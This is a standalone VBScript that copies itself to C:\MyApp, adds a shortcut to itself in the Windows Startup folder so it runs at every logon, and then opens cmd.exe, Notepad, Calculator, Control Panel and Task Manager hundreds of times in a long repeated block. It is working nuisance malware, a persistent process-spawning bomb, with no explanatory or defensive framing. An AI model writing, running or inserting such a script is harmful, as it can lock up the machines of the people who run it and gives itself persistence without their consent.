Set objShell = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")

strCurrentDirectory = objFSO.GetParentFolderName(WScript.ScriptFullName)

strDestinationFolder = "C:\MyApp"

If Not objFSO.FolderExists(strDestinationFolder) Then
    objFSO.CreateFolder strDestinationFolder
End If

strFileName = objFSO.GetFileName(WScript.ScriptFullName)

strSourceFile = objFSO.BuildPath(strCurrentDirectory, strFileName)

strDestinationFile = objFSO.BuildPath(strDestinationFolder, strFileName)

objFSO.CopyFile strSourceFile, strDestinationFile, True

strStartupFolder = objShell.SpecialFolders("Startup")

strShortcutName = "MyApp.lnk"

strShortcutFile = objFSO.BuildPath(strStartupFolder, strShortcutName)

Set objShortcut = objShell.CreateShortcut(strShortcutFile)
objShortcut.TargetPath = strDestinationFile
objShortcut.Save
objShell.Run "cmd.exe", 1, False

WScript.Sleep 1
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False
objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
